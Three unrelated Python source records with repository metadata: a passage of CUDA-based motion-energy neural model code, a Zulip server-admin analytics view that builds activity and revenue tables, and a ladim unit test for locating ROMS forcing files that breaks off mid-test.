bdim = (256, 1, 1)
self.dev_edges(
self.d_resp,
np.int32(length),
np.int32(self.nrX),
np.int32(self.nrY),
block=bdim, grid=gdim)
def _calcV1rect(self):
"""Performs full-wave rectification of the linear responses."""
logging.debug('calcV1rect')
length = self.nrX*self.nrY*self.nrFilters*self.nrScales
gdim = (int(iDivUp(length, 256)), 1)
bdim = (256, 1, 1)
self.dev_fullRect2(
self.d_resp,
np.int32(length),
np.double(self.scaleV1Linear),
np.double(self.scaleV1FullWaveRect),
block=bdim, grid=gdim)
def _calcV1blur(self):
logging.debug('calcV1blur')
d_tmp = cuda.mem_alloc(self.szXY*self.nrFilters*self.nrScales)
sizes = (self.nrX, self.nrY, self.nrFilters*self.nrScales)
self._conv2D(self.d_resp, d_tmp, sizes, self.d_complexV1Filt,
self.complexV1FiltSize)
d_tmp.free() # result ends up in d_resp
length = self.nrX * self.nrY * self.nrFilters * self.nrScales
gdim = (int(iDivUp(length, 256)), 1)
bdim = (256, 1, 1)
self.dev_scale(
self.d_resp,
np.double(self.scaleV1Blur),
np.int32(length),
block=bdim, grid=gdim)
def _calcV1normalize(self):
logging.debug('calcV1normalize')
# we need to associate each filter at pixel position (x,y) with a
# power/intensity, but there are 28 filter responses at each location
# so we need to (i) average over the 28 filters (3rd dimension in
# d_resp) and put it in d_pop
gdim = (int(iDivUp(self.nrX*self.nrY, 128)), self.nrScales)
bdim = (128, 1, 1)
self.dev_mean3(
self.d_resp,
self.d_pop,
np.int32(self.nrX*self.nrY),
np.int32(self.nrFilters),
block=bdim, grid=gdim)
# ... (ii) scale with scaleV1Complex ...
length = self.nrX*self.nrY*self.nrFilters*self.nrScales
gdim = (int(iDivUp(length, 128)), 1)
bdim = (128, 1, 1)
self.dev_scale(
self.d_resp,
np.double(self.scaleV1Complex),
np.int32(length),
block=bdim, grid=gdim)
# ... and (iii) sum over some spatial neighborhood for the
# normalization
sizes = (self.nrX, self.nrY, self.nrScales)
d_tmp = cuda.mem_alloc(self.szXY*self.nrScales)
self._conv2D(
self.d_pop,
d_tmp,
sizes,
self.d_normV1filt,
self.normV1filtSize)
d_tmp.free() # result ends up in d_pop
# scale with V1NormStrength and V1NormPopK
gdim = (int(iDivUp(self.nrX * self.nrY * self.nrScales, 128)), 1)
bdim = (128, 1, 1)
self.dev_scale(
self.d_pop,
np.double(self.scaleV1NormStrength*self.scaleV1NormPopK),
np.int32(self.nrX*self.nrY*self.nrScales),
block=bdim, grid=gdim)
# divisive normalization
# d_resp is the numerator, d_pop the denominator sum term
gdim = (int(iDivUp(self.nrX * self.nrY, 128)), self.nrScales)
bdim = (128, 1, 1)
self.dev_normalize(
self.d_resp,
self.d_pop,
np.int32(self.nrX*self.nrY),
np.double(self.scaleV1C50),
block=bdim, grid=gdim)
def _calcV1direction(self, speed):
"""Generate direction selectivity via filter interpolation.
The 28 filter responses do now need to be collapsed onto the
directions and speeds of motion specified in the motion
projections.
"""
logging.debug('calcV1direction')
length = self.nrX*self.nrY*self.nrFilters*self.nrScales*self.nrDirs
gdim = (int(iDivUp(length, 256)), 1)
bdim = (256, 1, 1)
self.dev_filt2dir(
self.d_respV1c,
self.d_resp,
np.int32(length),
np.int32(self.nrX * self.nrY),
np.int32(self.nrScales),
np.double(speed),
block=bdim, grid=gdim)
# half-wave rectification to avoid negative firing rates
# 0 Hz spontaneous firing
# \TODO justify scaling factors
# print "dont't halfrect again"
gdim = (int(iDivUp(self.nrX * self.nrY * self.nrDirs, 128)), 1)
bdim = (128, 1, 1)
self.dev_scaleHalfRect(
self.d_respV1c,
np.int32(self.nrX * self.nrY * self.nrDirs),
np.double(self.scaleV1ComplexFiring),
np.double(0),
block=bdim, grid=gdim)
def _conv2D(self, d_idata, d_odata, sizes, d_filt, filtlen):
logging.debug("conv2D")
# convolve the first dimension
gdim = (int(iDivUp(sizes[0], self.CONV1_THREAD_SIZE-(filtlen-1))),
sizes[1]*sizes[2])
bdim = (self.CONV1_THREAD_SIZE, 1, 1)
self.dev_conv1(
d_idata,
d_odata,
np.int32(sizes[0]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
szBytes = self.sizeofFloat*reduce(lambda x, y: x*y, sizes)
d_tmp = cuda.mem_alloc(szBytes)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
# convolve the second dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[1],
self.CONVN_THREAD_SIZE2-(filtlen - 1)) * sizes[2]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_idata,
d_odata,
np.int32(sizes[0]),
np.int32(sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[2]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
def _conv3D(self, d_idata, d_odata, sizes, d_filt, filtlen):
logging.debug('conv3D')
# convolve the first dimension
gdim = (int(iDivUp(sizes[0], self.CONV1_THREAD_SIZE-(filtlen - 1))),
sizes[1]*sizes[2])
bdim = (self.CONV1_THREAD_SIZE, 1, 1)
self.dev_conv1(
d_idata,
d_odata,
np.int32(sizes[0]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
szBytes = self.sizeofFloat*reduce(lambda x, y: x*y, sizes)
d_tmp = cuda.mem_alloc(szBytes)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
# convolve the second dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[1],
self.CONVN_THREAD_SIZE2 - (filtlen - 1))*sizes[2]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_idata,
d_odata,
np.int32(sizes[0]),
np.int32(sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[2]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
# convolve the third dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[2],
self.CONVN_THREAD_SIZE2 - (filtlen - 1))*sizes[1]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_idata,
d_odata,
np.int32(sizes[0]),
np.int32(sizes[2]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[1]),
np.intp(d_filt),
np.int32(filtlen),
block=bdim, grid=gdim)
cuda.memcpy_dtod(d_tmp, d_idata, szBytes)
cuda.memcpy_dtod(d_idata, d_odata, szBytes)
cuda.memcpy_dtod(d_odata, d_tmp, szBytes)
def _diff(self, d_iodata, sizes, order, dim):
"""Takes the derivative of iodata, returns as iodata."""
if order == 1:
filtlen = self.diff1filtSize
filt = self.d_diff1filt
elif order == 2:
filtlen = self.diff2filtSize
filt = self.d_diff2filt
elif order == 3:
filtlen = self.diff3filtSize
filt = self.d_diff3filt
else:
raise NameError("Order must be in the range [1,3]")
szBytes = self.sizeofFloat*reduce(lambda x, y: x*y, sizes)
d_tmp_odata = cuda.mem_alloc(szBytes)
if dim == 0:
# convolve the first dimension
gdim = (int(iDivUp(sizes[0],
self.CONV1_THREAD_SIZE - (filtlen-1))),
sizes[1] * sizes[2])
bdim = (self.CONV1_THREAD_SIZE, 1, 1)
self.dev_conv1(
d_iodata,
d_tmp_odata,
np.int32(sizes[0]),
np.intp(filt),
np.int32(filtlen),
block=bdim, grid=gdim)
elif dim == 1:
# convolve the second dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[1],
self.CONVN_THREAD_SIZE2 - (filtlen - 1)) * sizes[2]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_iodata,
d_tmp_odata,
np.int32(sizes[0]),
np.int32(sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[2]),
np.intp(filt),
np.int32(filtlen),
block=bdim, grid=gdim)
elif dim == 2:
# convolve the third dimension
gdim = (int(iDivUp(sizes[0], self.CONVN_THREAD_SIZE1)),
int(iDivUp(sizes[2],
self.CONVN_THREAD_SIZE2 - (filtlen - 1)) * sizes[1]))
bdim = (self.CONVN_THREAD_SIZE1, self.CONVN_THREAD_SIZE2, 1)
self.dev_convn(
d_iodata,
d_tmp_odata,
np.int32(sizes[0]),
np.int32(sizes[2]),
np.int32(sizes[0]*sizes[1]),
np.int32(sizes[0]),
np.int32(sizes[1]),
np.intp(filt),
np.int32(filtlen),
block=bdim, grid=gdim)
cuda.memcpy_dtod(d_iodata, d_tmp_odata, szBytes)
d_tmp_odata.free()
def _initCUDA(self):
"""Initializes CUDA and establishes context using pycuda.autoinit"""
self.context = None
self.device = pycuda.autoinit.device
self.computecc = self.device.compute_capability()
def _initME(self):
"""Initializes the MotionEnergy CUDA functions."""
logging.debug('initME')
# register all device functions for easy access
# imported from motion_energy_device.py
self.dev_conv1 = mod.get_function("dev_conv1")
self.dev_convn = mod.get_function("dev_convn")
self.dev_accumDiffStims = mod.get_function("dev_accumDiffStims")
self.dev_filt2dir = mod.get_function("dev_filt2dir")
self.dev_edges = mod.get_function("dev_edges")
self.dev_fullRect2 = mod.get_function("dev_fullRect2")
self.dev_mean3 = mod.get_function("dev_mean3")
self.dev_normalize = mod.get_function("dev_normalize")
self.dev_split_gray = mod.get_function("dev_split_gray")
self.dev_split_RGB = mod.get_function("dev_split_RGB")
self.dev_sub = mod.get_function("dev_sub")
self.dev_ave = mod.get_function("dev_ave")
self.dev_sum = mod.get_function("dev_sum")
self.dev_scaleHalfRect = mod.get_function("dev_scaleHalfRect")
self.dev_scale = mod.get_function("dev_scale")
self.dev_split_gray = mod.get_function("dev_split_gray")
self.dev_split_RGB = mod.get_function("dev_split_RGB")
self.dev_memcpy_dtod = mod.get_function("dev_memcpy_dtod")
# for quick access: the size in bytes of nrX*nrY floats
self.szXY = self.sizeofFloat * self.nrX * self.nrY
# V1 filter responses
self.d_resp = cuda.mem_alloc(self.szXY*self.nrFilters*self.nrScales)
# V1 complex cell responses
self.d_respV1c = cuda.mem_alloc(self.szXY*self.nrDirs)
# stim frame
self.d_stim = cuda.mem_alloc(self.szXY*self.nrC)
# stim frame buffer (last nrT frames)
self.d_stimBuf = cuda.mem_alloc(self.szXY*self.nrT)
# I'm not sure if this memset works as expected... for now, memcpy an
# array of zeros
# cuda.memset_d32(self.d_stimBuf, 0, self.nrX*self.nrY*self.nrT)
tmp = np.zeros(self.nrX*self.nrY*self.nrT).astype(np.float32)
cuda.memcpy_htod(self.d_stimBuf, tmp)
self.d_diffV1GausBufT = cuda.mem_alloc(self.szXY*self.v1GaussFiltSize)
self.d_scalingStimBuf = cuda.mem_alloc(self.szXY*self.nrT)
self.d_v1GausBuf = cuda.mem_alloc(self.szXY*self.v1GaussFiltSize)
self.d_diffV1GausBuf = cuda.mem_alloc(self.szXY*self.v1GaussFiltSize)
self.d_pop = cuda.mem_alloc(self.szXY*self.nrScales)
self.d_scalingFilt = mod.get_global("d_scalingFilt")[0]
self.d_v1GaussFilt = mod.get_global("d_v1GaussFilt")[0]
self.d_complexV1Filt = mod.get_global("d_complexV1Filt")[0]
self.d_normV1filt = mod.get_global("d_normV1filt")[0]
self.d_diff1filt = mod.get_global("d_diff1filt")[0]
self.d_diff2filt = mod.get_global("d_diff2filt")[0]
self.d_diff3filt = mod.get_global("d_diff3filt")[0]
def _initParams(self):
"""Initializes all class attributes to default values, akin to
shPars.m
"""
logging.debug('initParams')
self.nrDirs = 8
self.nrFilters = 28
self.nrScales = 3 # number of scales at which to filter
self.nrT = 9
self.v1GaussFiltSize = 9
# from shGetDims
# dimensions must be greater or equal these
# \TODO compute instead of hardcoding
self.minNrX = 19
self.minNrY = 19
self.scalingFiltSize = 5
self.CONV1_THREAD_SIZE = 256
self.CONVN_THREAD_SIZE1 = 16
self.CONVN_THREAD_SIZE2 = 31 # 31 is faster than 32
# S&H scaling factors
self.scaleV1Linear = 6.6084
self.scaleV1FullWaveRect = 1.9263
self.scaleV1Blur = 1.0205
self.scaleV1NormPopK = 1.0 # 0.2401
self.scaleV1NormStrength = 0.98
self.scaleV1Complex = 0.99
self.scaleV1C50 = 0.1
self.scaleV1ComplexFiring = 10.0
# some more #define
self.diff1filtSize = 3
self.diff2filtSize = 3
self.diff3filtSize = 5
self.complexV1FiltSize = 11
self.normV1filtSize = 25
def _loadInput(self, stim):
logging.debug('loadInput')
# shortcuts
nrXY = self.nrX * self.nrY
nrXYD = self.nrX * self.nrY * self.nrDirs
# parse input
assert type(stim).__module__ == "numpy", "stim must be numpy array"
assert type(stim).__name__ == "ndarray", "stim must be numpy.ndarray"
assert stim.size > 0, "stim cannot be []"
stim = stim.astype(np.ubyte)
rows, cols = stim.shape
logging.debug("- stim shape={0}x{1}".format(rows, cols))
# shift d_stimBuf in time by 1 frame, from frame i to frame i-1
# write our own memcpy kernel... :-(
gdim = (int(iDivUp(nrXY, 128)), 1)
bdim = (128, 1, 1)
for i in xrange(1, self.nrT):
stimBufPt_dst = np.intp(self.d_stimBuf) + self.szXY * (i - 1)
stimBufPt_src = np.intp(self.d_stimBuf) + self.szXY * i
self.dev_memcpy_dtod(
stimBufPt_dst,
stimBufPt_src,
np.int32(nrXY),
block=bdim, grid=gdim)
# index into d_stimBuf array to place the new stim at the end
# (newest frame at pos: nrT-1)
d_stimBufPt = np.intp(self.d_stimBuf) + self.szXY * (self.nrT-1)
# \TODO implement RGB support
self.dev_split_gray(
d_stimBufPt,
cuda.In(stim),
np.int32(stim.size),
block=bdim, grid=gdim)
# create working copy of d_stimBuf
cuda.memcpy_dtod(self.d_scalingStimBuf, self.d_stimBuf,
self.szXY*self.nrT)
# reset V1complex responses to 0
# \FIXME not sure how to use memset...doesn't seem to give expected
# result
tmp = np.zeros(nrXYD).astype(np.float32)
cuda.memcpy_htod(self.d_respV1c, tmp)
# allocate d_resp, which will contain the response to all 28
# (nrFilters) space-time orientations at 3 (nrScales) scales for
# every pixel location (nrX*nrY)
tmp = np.zeros(nrXY*self.nrFilters*self.nrScales).astype(np.float32)
cuda.memcpy_htod(self.d_resp, tmp)
|
UCI-CARL/MotionEnergy
|
pyME/pyME/motionenergy.py
|
Python
|
mit
| 26,322
|
[
"Gaussian"
] |
3f6ae503a589febefe379e00d8b9c1deaa6cb2f6423cbb14345423a0b6b06893
|
import itertools
import time
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Callable, Dict, List, Optional, Sequence, Tuple, Union
from django.conf import settings
from django.db import connection
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from django.template import loader
from django.utils.timezone import now as timezone_now
from jinja2.utils import Markup as mark_safe
from psycopg2.sql import SQL, Composable, Literal
from analytics.lib.counts import COUNT_STATS
from analytics.views.activity_common import (
dictfetchall,
format_date_for_activity_reports,
make_table,
realm_activity_link,
realm_stats_link,
remote_installation_stats_link,
)
from analytics.views.support import get_plan_name
from zerver.decorator import require_server_admin
from zerver.lib.request import has_request_variables
from zerver.lib.timestamp import timestamp_to_datetime
from zerver.models import Realm, UserActivityInterval, UserProfile, get_org_type_display_name
if settings.BILLING_ENABLED:
from corporate.lib.stripe import (
estimate_annual_recurring_revenue_by_realm,
get_realms_to_default_discount_dict,
)
def get_realm_day_counts() -> Dict[str, Dict[str, str]]:
query = SQL(
"""
select
r.string_id,
(now()::date - date_sent::date) age,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
join zerver_client c on c.id = m.sending_client_id
where
(not up.is_bot)
and
date_sent > now()::date - interval '8 day'
and
c.name not in ('zephyr_mirror', 'ZulipMonitoring')
group by
r.string_id,
age
order by
r.string_id,
age
"""
)
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
counts: Dict[str, Dict[int, int]] = defaultdict(dict)
for row in rows:
counts[row["string_id"]][row["age"]] = row["cnt"]
result = {}
for string_id in counts:
raw_cnts = [counts[string_id].get(age, 0) for age in range(8)]
min_cnt = min(raw_cnts[1:])
max_cnt = max(raw_cnts[1:])
def format_count(cnt: int, style: Optional[str] = None) -> str:
if style is not None:
good_bad = style
elif cnt == min_cnt:
good_bad = "bad"
elif cnt == max_cnt:
good_bad = "good"
else:
good_bad = "neutral"
return f'<td class="number {good_bad}">{cnt}</td>'
cnts = format_count(raw_cnts[0], "neutral") + "".join(map(format_count, raw_cnts[1:]))
result[string_id] = dict(cnts=cnts)
return result
def realm_summary_table(realm_minutes: Dict[str, float]) -> str:
now = timezone_now()
query = SQL(
"""
SELECT
realm.string_id,
realm.date_created,
realm.plan_type,
realm.org_type,
coalesce(wau_table.value, 0) wau_count,
coalesce(dau_table.value, 0) dau_count,
coalesce(user_count_table.value, 0) user_profile_count,
coalesce(bot_count_table.value, 0) bot_count
FROM
zerver_realm as realm
LEFT OUTER JOIN (
SELECT
value _14day_active_humans,
realm_id
from
analytics_realmcount
WHERE
property = 'realm_active_humans::day'
AND end_time = %(realm_active_humans_end_time)s
) as _14day_active_humans_table ON realm.id = _14day_active_humans_table.realm_id
LEFT OUTER JOIN (
SELECT
value,
realm_id
from
analytics_realmcount
WHERE
property = '7day_actives::day'
AND end_time = %(seven_day_actives_end_time)s
) as wau_table ON realm.id = wau_table.realm_id
LEFT OUTER JOIN (
SELECT
value,
realm_id
from
analytics_realmcount
WHERE
property = '1day_actives::day'
AND end_time = %(one_day_actives_end_time)s
) as dau_table ON realm.id = dau_table.realm_id
LEFT OUTER JOIN (
SELECT
value,
realm_id
from
analytics_realmcount
WHERE
property = 'active_users_audit:is_bot:day'
AND subgroup = 'false'
AND end_time = %(active_users_audit_end_time)s
) as user_count_table ON realm.id = user_count_table.realm_id
LEFT OUTER JOIN (
SELECT
value,
realm_id
from
analytics_realmcount
WHERE
property = 'active_users_audit:is_bot:day'
AND subgroup = 'true'
AND end_time = %(active_users_audit_end_time)s
) as bot_count_table ON realm.id = bot_count_table.realm_id
WHERE
_14day_active_humans IS NOT NULL
or realm.plan_type = 3
ORDER BY
dau_count DESC,
string_id ASC
"""
)
cursor = connection.cursor()
cursor.execute(
query,
{
"realm_active_humans_end_time": COUNT_STATS[
"realm_active_humans::day"
].last_successful_fill(),
"seven_day_actives_end_time": COUNT_STATS["7day_actives::day"].last_successful_fill(),
"one_day_actives_end_time": COUNT_STATS["1day_actives::day"].last_successful_fill(),
"active_users_audit_end_time": COUNT_STATS[
"active_users_audit:is_bot:day"
].last_successful_fill(),
},
)
rows = dictfetchall(cursor)
cursor.close()
# Fetch all the realm administrator users
realm_owners: Dict[str, List[str]] = defaultdict(list)
for up in UserProfile.objects.select_related("realm").filter(
role=UserProfile.ROLE_REALM_OWNER,
is_active=True,
):
realm_owners[up.realm.string_id].append(up.delivery_email)
for row in rows:
row["date_created_day"] = row["date_created"].strftime("%Y-%m-%d")
row["age_days"] = int((now - row["date_created"]).total_seconds() / 86400)
row["is_new"] = row["age_days"] < 12 * 7
row["realm_owner_emails"] = ", ".join(realm_owners[row["string_id"]])
# get messages sent per day
counts = get_realm_day_counts()
for row in rows:
try:
row["history"] = counts[row["string_id"]]["cnts"]
except Exception:
row["history"] = ""
# estimate annual subscription revenue
total_arr = 0
if settings.BILLING_ENABLED:
estimated_arrs = estimate_annual_recurring_revenue_by_realm()
realms_to_default_discount = get_realms_to_default_discount_dict()
for row in rows:
row["plan_type_string"] = get_plan_name(row["plan_type"])
string_id = row["string_id"]
if string_id in estimated_arrs:
row["arr"] = estimated_arrs[string_id]
if row["plan_type"] == Realm.STANDARD:
row["effective_rate"] = 100 - int(realms_to_default_discount.get(string_id, 0))
elif row["plan_type"] == Realm.STANDARD_FREE:
row["effective_rate"] = 0
elif row["plan_type"] == Realm.LIMITED and string_id in realms_to_default_discount:
row["effective_rate"] = 100 - int(realms_to_default_discount[string_id])
else:
row["effective_rate"] = ""
total_arr += sum(estimated_arrs.values())
for row in rows:
row["org_type_string"] = get_org_type_display_name(row["org_type"])
# augment data with realm_minutes
total_hours = 0.0
for row in rows:
string_id = row["string_id"]
minutes = realm_minutes.get(string_id, 0.0)
hours = minutes / 60.0
total_hours += hours
row["hours"] = str(int(hours))
try:
row["hours_per_user"] = "{:.1f}".format(hours / row["dau_count"])
except Exception:
pass
# formatting
for row in rows:
row["stats_link"] = realm_stats_link(row["string_id"])
row["string_id"] = realm_activity_link(row["string_id"])
# Count active sites
def meets_goal(row: Dict[str, int]) -> bool:
return row["dau_count"] >= 5
num_active_sites = len(list(filter(meets_goal, rows)))
# create totals
total_dau_count = 0
total_user_profile_count = 0
total_bot_count = 0
total_wau_count = 0
for row in rows:
total_dau_count += int(row["dau_count"])
total_user_profile_count += int(row["user_profile_count"])
total_bot_count += int(row["bot_count"])
total_wau_count += int(row["wau_count"])
total_row = dict(
string_id="Total",
plan_type_string="",
org_type_string="",
effective_rate="",
arr=total_arr,
stats_link="",
date_created_day="",
realm_owner_emails="",
dau_count=total_dau_count,
user_profile_count=total_user_profile_count,
bot_count=total_bot_count,
hours=int(total_hours),
wau_count=total_wau_count,
)
rows.insert(0, total_row)
content = loader.render_to_string(
"analytics/realm_summary_table.html",
dict(
rows=rows,
num_active_sites=num_active_sites,
utctime=now.strftime("%Y-%m-%d %H:%MZ"),
billing_enabled=settings.BILLING_ENABLED,
),
)
return content
def user_activity_intervals() -> Tuple[mark_safe, Dict[str, float]]:
day_end = timestamp_to_datetime(time.time())
day_start = day_end - timedelta(hours=24)
output = "Per-user online duration for the last 24 hours:\n"
total_duration = timedelta(0)
all_intervals = (
UserActivityInterval.objects.filter(
end__gte=day_start,
start__lte=day_end,
)
.select_related(
"user_profile",
"user_profile__realm",
)
.only(
"start",
"end",
"user_profile__delivery_email",
"user_profile__realm__string_id",
)
.order_by(
"user_profile__realm__string_id",
"user_profile__delivery_email",
)
)
by_string_id = lambda row: row.user_profile.realm.string_id
by_email = lambda row: row.user_profile.delivery_email
realm_minutes = {}
for string_id, realm_intervals in itertools.groupby(all_intervals, by_string_id):
realm_duration = timedelta(0)
output += f"<hr>{string_id}\n"
for email, intervals in itertools.groupby(realm_intervals, by_email):
duration = timedelta(0)
for interval in intervals:
start = max(day_start, interval.start)
end = min(day_end, interval.end)
duration += end - start
total_duration += duration
realm_duration += duration
output += f" {email:<37}{duration}\n"
realm_minutes[string_id] = realm_duration.total_seconds() / 60
output += f"\nTotal duration: {total_duration}\n"
output += f"\nTotal duration in minutes: {total_duration.total_seconds() / 60.}\n"
output += f"Total duration amortized to a month: {total_duration.total_seconds() * 30. / 60.}"
content = mark_safe("<pre>" + output + "</pre>")
return content, realm_minutes
def ad_hoc_queries() -> List[Dict[str, str]]:
def get_page(
query: Composable, cols: Sequence[str], title: str, totals_columns: Sequence[int] = []
) -> Dict[str, str]:
cursor = connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
rows = list(map(list, rows))
cursor.close()
def fix_rows(
i: int, fixup_func: Union[Callable[[str], mark_safe], Callable[[datetime], str]]
) -> None:
for row in rows:
row[i] = fixup_func(row[i])
total_row = []
for i, col in enumerate(cols):
if col == "Realm":
fix_rows(i, realm_activity_link)
elif col in ["Last time", "Last visit"]:
fix_rows(i, format_date_for_activity_reports)
elif col == "Hostname":
for row in rows:
row[i] = remote_installation_stats_link(row[0], row[i])
if len(totals_columns) > 0:
if i == 0:
total_row.append("Total")
elif i in totals_columns:
total_row.append(str(sum(row[i] for row in rows if row[i] is not None)))
else:
total_row.append("")
if len(totals_columns) > 0:
rows.insert(0, total_row)
content = make_table(title, cols, rows)
return dict(
content=content,
title=title,
)
pages = []
###
for mobile_type in ["Android", "ZulipiOS"]:
title = f"{mobile_type} usage"
query = SQL(
"""
select
realm.string_id,
up.id user_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like {mobile_type}
group by string_id, up.id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, up.id, client.name
"""
).format(
mobile_type=Literal(mobile_type),
)
cols = [
"Realm",
"User id",
"Name",
"Hits",
"Last time",
]
pages.append(get_page(query, cols, title))
###
title = "Desktop users"
query = SQL(
"""
select
realm.string_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like 'desktop%%'
group by string_id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, client.name
"""
)
cols = [
"Realm",
"Client",
"Hits",
"Last time",
]
pages.append(get_page(query, cols, title))
###
title = "Integrations by realm"
query = SQL(
"""
select
realm.string_id,
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by string_id, client_name
having max(last_visit) > now() - interval '2 week'
order by string_id, client_name
"""
)
cols = [
"Realm",
"Client",
"Hits",
"Last time",
]
pages.append(get_page(query, cols, title))
###
title = "Integrations by client"
query = SQL(
"""
select
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
realm.string_id,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by client_name, string_id
having max(last_visit) > now() - interval '2 week'
order by client_name, string_id
"""
)
cols = [
"Client",
"Realm",
"Hits",
"Last time",
]
pages.append(get_page(query, cols, title))
title = "Remote Zulip servers"
query = SQL(
"""
with icount as (
select
server_id,
max(value) as max_value,
max(end_time) as max_end_time
from zilencer_remoteinstallationcount
where
property='active_users:is_bot:day'
and subgroup='false'
group by server_id
),
remote_push_devices as (
select server_id, count(distinct(user_id)) as push_user_count from zilencer_remotepushdevicetoken
group by server_id
)
select
rserver.id,
rserver.hostname,
rserver.contact_email,
max_value,
push_user_count,
max_end_time
from zilencer_remotezulipserver rserver
left join icount on icount.server_id = rserver.id
left join remote_push_devices on remote_push_devices.server_id = rserver.id
order by max_value DESC NULLS LAST, push_user_count DESC NULLS LAST
"""
)
cols = [
"ID",
"Hostname",
"Contact email",
"Analytics users",
"Mobile users",
"Last update time",
]
pages.append(get_page(query, cols, title, totals_columns=[3, 4]))
return pages
@require_server_admin
@has_request_variables
def get_installation_activity(request: HttpRequest) -> HttpResponse:
duration_content, realm_minutes = user_activity_intervals()
counts_content: str = realm_summary_table(realm_minutes)
data = [
("Counts", counts_content),
("Durations", duration_content),
]
for page in ad_hoc_queries():
data.append((page["title"], page["content"]))
title = "Activity"
return render(
request,
"analytics/activity.html",
context=dict(data=data, title=title, is_home=True),
)
|
hackerkid/zulip
|
analytics/views/installation_activity.py
|
Python
|
apache-2.0
| 19,623
|
[
"VisIt"
] |
1a4e8d3aa6e5cb39c4e9d2b78eb1773d10c9ceb4ff78825dc38065f5969fbd41
|
from pathlib import Path
from datetime import datetime
import numpy as np
from netCDF4 import Dataset
import pytest
from ladim.gridforce.ROMS import Forcing
@pytest.fixture
def nc_files():
# Setup, make netCDF files with time records
for i in range(10):
fname = f"test_file{i:02d}.nc"
ncid = Dataset(fname, mode="w")
ncid.createDimension("time", size=3)
v = ncid.createVariable("ocean_time", "float64", ("time",))
v.units = "seconds since 2015-01-01 00:00:00"
v[:] = [i * 86400, i * 86400 + 3600, i * 86400 + 7200]
ncid.close()
yield
# Remove the files
for i in range(10):
Path(f"test_file{i:02d}.nc").unlink()
def test_find_files(nc_files):
"""Finding correct forcing files"""
config = dict(input_file="test_file*.nc")
files = Forcing.find_files(config)
assert len(files) == 10
# Limit from front
config = dict(input_file="test_file*.nc", first_file="test_file02.nc")
files = Forcing.find_files(config)
assert files[0] == "test_file02.nc"
assert len(files) == 8
# Limit from back
config = dict(input_file="test_file*.nc", last_file="test_file02.nc")
files = Forcing.find_files(config)
assert files[-1] == "test_file02.nc"
assert len(files) == 3
# Last file after all
config = dict(input_file="test_file*.nc", last_file="xxx.nc")
files = Forcing.find_files(config)
assert len(files) == 10
# First file after all
config = dict(input_file="test_file*.nc", first_file="xxx.nc")
files = Forcing.find_files(config)
assert files == []
# Test single file
config = dict(input_file="test_file03.nc")
files = Forcing.find_files(config)
assert files == ["test_file03.nc"]
def test_scan_times(nc_files):
# Everything is OK
files = [f"test_file{i:02d}.nc" for i in range(10)]
all_frames, num_frames = Forcing.scan_file_times(files)
assert len(all_frames) == 30
assert all_frames[4] == np.datetime64("2015-01-02 01")
assert all(np.unique(all_frames) == all_frames)
assert len(num_frames) == 10
assert num_frames["test_file05.nc"] == 3
# Time frames not ordered
